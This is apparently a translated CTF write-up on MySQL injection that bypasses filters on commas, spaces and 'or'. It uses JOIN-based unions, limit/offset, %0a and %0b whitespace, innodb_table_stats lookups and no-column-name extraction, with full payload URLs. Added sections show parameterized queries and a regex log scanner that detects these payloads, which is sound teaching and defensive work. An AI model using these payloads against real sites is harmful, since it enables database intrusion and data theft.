SQLi: bypassing filters on commas, spaces and column names

Foreword

The easysql challenge from a Shanghai university student network security contest led me to put this article together. I spent most of my time on Decade and Babyt5 and never got to easysql; afterwards I read the write-up (WP) and could not understand how it was solved, so I learned a lot from it.

No-column-name injection

Premise: easysql filtered or, so information_schema could not be used; the table name had to be obtained from the InnoDB storage engine's tables, and since the column names were unknown, the field data had to be read by no-column-name injection.

In fact, I followed the article and recorded my own practice while reading it, writing it up in more detail so that it is easier to understand thoroughly.

select 1,2,3,4 is not itself a table, but its result set can be regarded as a virtual table.


With union select we can fill this virtual table with the data of the table we want to read (remember that with union the number of columns on the left and right sides must be the same).


Then, by giving this virtual table an alias, injection without column names can be achieved.

The data of the table we want to see is imported into the virtual table, and the column names become 1,2,3,4.


The data we want starts from the second row, so it can be fetched with limit 2,1 or limit 1 offset 2 (here the second row was not selected because it is the comparison data; limit 1 offset 2 bypasses the comma in limit 2,1, and the two forms are easy to confuse because their parameters correspond differently):

limit 2,1: starting from the third row, fetch one row

limit 1 offset 2: fetch one row after an offset of 2 rows (the same rows as limit 2,1, written without a comma)


This completes the no-column-name injection.

InnoDB storage engine

Because my local MySQL is 5.5.53 and I did not want to deploy a docker image, I copied the contents of the article directly. (Apologies)

In the Red Hat Cup write-up, the table name had to be obtained through InnoDB, because or was filtered and information_schema could not be accessed.

MySQL > 5.6.x

MySQL's default storage engines fall into two categories: MyISAM, the default before 5.5.x, and InnoDB, which the MySQL development team made the default from 5.5.x onward.

Starting with MySQL 5.6.x, InnoDB added two new tables, innodb_index_stats and innodb_table_stats. The official documentation explains them, and two useful pieces of information can be drawn from it:

  1. Starting with 5.6.x, the innodb_index_stats and innodb_table_stats tables are maintained automatically.
  2. Both tables store the database name and the names of the corresponding data tables.

The only regret is that they contain no field names.


Local test: MySQL 5.6.40


innodb_index_stats


select * from mysql.innodb_index_stats limit 0,3;


innodb_table_stats

select * from mysql.innodb_table_stats limit 0,1


Payload: select table_name from mysql.innodb_table_stats where database_name = schema()

Premise: MySQL > 5.6.x

Payload to look up the table names:

select group_concat(table_name) from mysql.innodb_table_stats where database_name like database()

Bypass

There are many tricks for bypassing a WAF; some basic ones are listed here.

1. First, spaces are filtered; there are many ways to bypass this:

  • Comment bypass: /**/. If '/' is filtered, this method cannot be used.
  • Parenthesis bypass: subqueries can be wrapped in parentheses; the result of any statement can be wrapped in () so that no extra spaces are needed around it.
  • Whitespace substitutes: %20 %09 %0d %0b %0c %0d %a0 %0a; here I chose %0a for the bypass.

2. For comma filtering, I had not known a method before; after checking a lot of material and articles, I found one:

Join

Join bypasses the comma; combined with the union injection payload (I found that the code in the picture may not copy and paste directly, which makes reproducing it inconvenient):

mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

(SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;

This form is similar to the following:

mysql> select*from(select 1,2,3,4)a;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

Queries can be constructed in the same way:

mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT version())d;
+---+---+---+-----------+
| 1 | 2 | 3 | version() |
+---+---+---+-----------+
| 1 | 2 | 3 | 5.5.53    |
+---+---+---+-----------+
1 row in set (0.00 sec)

Bypassing the comma to achieve union injection:

select*from people where id=-1 union select*from((select 1)b join (select 2)a join (select 3)c join (select 4)d);
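To show why the comma-free union above works against a concatenated query and what stops it, here is an added example in Python with sqlite3 (not code from the original post). A constructed people table is queried once with string concatenation, the way a vulnerable article.php would, once with a bound parameter, and once behind an integer allow-list check; the table layout, the row values and the function names are assumptions, and the payload is the join-based union from the examples above, which sqlite accepts as well.

```python
import sqlite3

# The comma-free union from the write-up: cross-joined one-column subqueries stand in for "1,2,3,4".
COMMA_FREE_UNION = (
    "-1 union select * from (select 1)b join (select 2)a join (select 3)c join (select 4)d"
)


def build_db():
    """Constructed sample data: a four-column people table (names and layout are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table people(id integer primary key, name text, email text, role text)")
    conn.executemany(
        "insert into people values (?, ?, ?, ?)",
        [(1, "alice", "alice@example.test", "admin"), (2, "bob", "bob@example.test", "user")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the request parameter becomes SQL text, so the union runs."""
    return conn.execute("select * from people where id=" + user_id).fetchall()


def lookup_safe(conn, user_id):
    """Bound parameter: the same string is compared as a value and is never parsed as SQL."""
    return conn.execute("select * from people where id=?", (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    """Defence in depth: an article id must be an integer, so reject anything else up front."""
    if not user_id.strip().lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    return lookup_safe(conn, int(user_id))


if __name__ == "__main__":
    db = build_db()
    print("concatenated :", lookup_vulnerable(db, COMMA_FREE_UNION))  # the joined 1,2,3,4 row comes back
    print("parameterized:", lookup_safe(db, COMMA_FREE_UNION))        # no row matches the literal string
    print("validated    :", lookup_validated(db, "2"))
```

The concatenated query returns the attacker-chosen row even though the payload contains no comma, which is the point of the join trick; the parameterized query treats the whole string as one value, so a keyword filter is not needed at all, and the integer check rejects the request before it reaches the database.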


Analysis with the write-up

Because I never touched easysql, I can only rely on the write-up for the analysis.

First step

1. Try to find the echo point; use join to bypass the comma filter.

/article.php?id=0'union%0bselect * from (select 1)a join (select 2)b join (select 3)c join (select 4)d%23

The union query locates the injection point; since the comma is filtered, join is used to bypass it and reveal the displayed columns.

Second step

2. Try to dump the table names. Since or is filtered, we use another system table, mysql.innodb_table_stats.

/article.php?id=0'union%0bselect * from (select 1)a join (select (select group_concat(table_name) from mysql.innodb_table_stats where database_name like database()))b join (select 3)c join (select 4)d%23

With or filtered, the table names are dumped through InnoDB. The second step needs careful analysis: (select (select group_concat(table_name) from mysql.innodb_table_stats where database_name like database())) b can only return a single field with a single value, not several fields. The subquery could also be restricted with limit => (select table_name from mysql.innodb_table_stats where database_name like database()) b, but that is not as fast as group_concat, which lists all the table names directly instead of reading them one at a time with limit.

Third step

/article.php?id=0' union%0bselect * from (select 1)z join (select i.3 from (select * from (select 1)a join (select 2)b join (select 3)c union%0bselect * from fl111aa44a99g)i limit 1 offset 1)x join (select 3)v join (select 3)n%23

The most important part of the analysis is the following:

join (select i.3 from (select * from (select 1)a join (select 2)b join (select 3)c union%0bselect * from fl111aa44a99g)i limit 1 offset 1)x

This is no-column-name injection combined with join to bypass the comma.

The only difference is that (select 1,2,3 union select * from fl111aa44a99g)i is replaced by the join form: (select * from (select 1)a join (select 2)b join (select 3)c union%0bselect * from fl111aa44a99g)i
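As a defender's counterpart to the three steps above, here is an added Python example (not part of the original write-up) that normalizes request paths the way a filter must before matching: it URL-decodes, folds the whitespace substitutes listed in the bypass section (%09 %0a %0b %0c %0d %a0) and /**/ comments into a single space, lower-cases, and only then looks for the patterns used in the walkthrough (union select, the join-based comma bypass, the innodb stats tables, and limit/offset row walking). The access-log lines are constructed; the paths reuse the three payloads above (including the fl111aa44a99g table name from the write-up), and the rule names and function names are assumptions.

```python
import re
from urllib.parse import unquote

# Whitespace substitutes and inline comments that a filter matching only the literal
# space character would miss (the write-up lists %09 %0a %0b %0c %0d %a0 and /**/).
WS_EQUIV = re.compile(r"[\t\n\x0b\x0c\r\xa0]+|/\*.*?\*/")
# Records that the request used an encoded whitespace substitute rather than %20.
ENCODED_WS = re.compile(r"%(?:0[9abcd]|a0)", re.IGNORECASE)
# Request line of a common-log-format entry; the path is what we inspect.
REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Patterns from the walkthrough, applied to the normalized (decoded, lower-cased) path.
RULES = [
    ("union-select", re.compile(r"\bunion\s+select\b")),
    # "(select 1)a join (select 2)b ...": cross joins standing in for a comma-separated list
    ("join-comma-bypass", re.compile(r"\)\s*\w+\s+join\s*\(\s*select\b")),
    # information_schema replacement used when "or" is filtered
    ("innodb-stats-table", re.compile(r"\binnodb_(?:table|index)_stats\b")),
    # row-at-a-time extraction without the comma of "limit 2,1"
    ("limit-offset-walk", re.compile(r"\blimit\s+\d+\s+offset\s+\d+\b")),
]


def normalize_query(raw):
    """Decode and canonicalize a request path so the keyword rules see what MySQL would."""
    decoded = unquote(raw, encoding="latin-1")  # latin-1 keeps %a0 as \xa0 instead of U+FFFD
    decoded = WS_EQUIV.sub(" ", decoded)
    return re.sub(r" {2,}", " ", decoded).lower()


def classify(raw):
    """Return the rule names that fire for one request path (empty list = not flagged)."""
    norm = normalize_query(raw)
    tags = [name for name, rx in RULES if rx.search(norm)]
    if tags and ENCODED_WS.search(raw):
        tags.append("encoded-whitespace")
    return tags


def scan_log(lines):
    """Return (path, tags) for every flagged request line in an access log."""
    hits = []
    for line in lines:
        m = REQ_LINE.search(line)
        if m:
            tags = classify(m.group(1))
            if tags:
                hits.append((m.group(1), tags))
    return hits


# Constructed access-log sample: the three payloads of the walkthrough plus two benign requests.
SAMPLE_LOG = [
    "203.0.113.7 - - [10/Nov/2019:10:00:01 +0000] \"GET /article.php?id=0'union%0bselect%20*%20from%20(select%201)a%20join%20(select%202)b%20join%20(select%203)c%20join%20(select%204)d%23 HTTP/1.1\" 200 512",
    "203.0.113.8 - - [10/Nov/2019:10:00:02 +0000] \"GET /article.php?id=42 HTTP/1.1\" 200 2048",
    "203.0.113.7 - - [10/Nov/2019:10:00:03 +0000] \"GET /article.php?id=0'union%0bselect%20*%20from%20(select%201)a%20join%20(select(select%20group_concat(table_name)%20from%20mysql.innodb_table_stats%20where%20database_name%20like%20database()))b%20join%20(select%203)c%20join%20(select%204)d%23 HTTP/1.1\" 200 540",
    "203.0.113.9 - - [10/Nov/2019:10:00:04 +0000] \"GET /search.php?q=join%20the%20union%20meeting HTTP/1.1\" 200 900",
    "203.0.113.7 - - [10/Nov/2019:10:00:05 +0000] \"GET /article.php?id=0'union%0aselect%20*%20from%20(select%201)z%20join%20(select%20i.3%20from%20(select%20*%20from%20(select%201)a%20join%20(select%202)b%20join%20(select%203)c%20union%0aselect%20*%20from%20fl111aa44a99g)i%20limit%201%20offset%201)x%20join%20(select%203)v%20join%20(select%203)n%23 HTTP/1.1\" 200 560",
]

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(", ".join(tags), "<-", path[:80])
```

The decisive step is the normalization: a rule written as "union select" with a literal space never fires on the %0b variant, while a rule applied after folding the whitespace substitutes catches all three steps and still ignores the benign search query that merely contains the words join and union.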

sleep

1.40 a


Learning links:

https://blog.csdn.net/qq_40500631/article/details/89631904

http://p0desta.com/2018/03/29/SQL%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/#1-10-%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5

https://www.o2oxy.cn/1929.html


Origin www.cnblogs.com/BOHB-yunying/p/11854437.html